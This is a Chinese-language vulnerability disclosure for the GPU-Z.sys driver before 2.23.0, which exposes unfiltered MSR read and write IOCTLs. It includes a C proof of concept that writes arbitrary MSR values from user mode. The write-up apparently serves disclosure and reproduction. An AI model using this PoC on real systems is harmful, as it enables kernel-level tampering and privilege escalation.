漏洞描述：

在2.23.0之前的GPU-Z中的GPU-Z.sys中发现了一个问题。易受攻击的驱动程序通过IOCTL公开了wrmsr指令，并且未正确过滤模型特定寄存器（MSR）。允许任意MSR写操作可能会导致执行Ring-0代码并提升特权。

漏洞形成：

在GPU-Z驱动中发现IOCTL 0x80006430+24与0x80006430+28中存在直接的读与写MSR的功能，并且没有任何有效的过滤操作。使得通过DeviceIoControl 请求指定IOCTL后能够在R3直接操控MSR对系统和CPU的重要配置信息进行读取修改替换。

漏洞复现:

POC:

#define DEV_NAME _T("\\\\.\\GPU-Z")

//参数为 4字节 MSR编号 ，输出8字节数据

#define IOCTL_RDMSR 0x80006430+24

//参数为 4字节 MSR编号 和 8字节数据

#define IOCTL_WRMSR 0x80006430+28



#pragma pack(push)

#pragma pack(1)

typedef struct _WRMSR_INFO {

UINT32 MsrID;

UINT64 MsrData;

}WRMSR_INFO, *PWRMSR_INFO;

#pragma pack(pop)

int main(){

WRMSR_INFO MsrInfo;

HANDLE hFile;

hFile = CreateFile(DEV_NAME, FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_DEVICE, NULL);

if (hFile == INVALID_HANDLE_VALUE)

{

printf("打开设备失败%x\n", GetLastError());

return 0;

}

DWORD dwRetSize = 0;

printf("输入欲修改的MSR ID(hex):");

scanf_s("%x", &MsrInfo.MsrID);

printf("输入数据(hex):");

scanf_s("%I64x", &MsrInfo.MsrData);

DeviceIoControl(hFile, IOCTL_WRMSR, &MsrInfo, sizeof(MsrInfo), NULL, 0, &dwRetSize, NULL);

if (dwRetSize)

printf("[-]修改失败!错误：%d\n", GetLastError());

else

printf("[+]修改成功~\n");



CloseHandle(hFile);

return 0;

}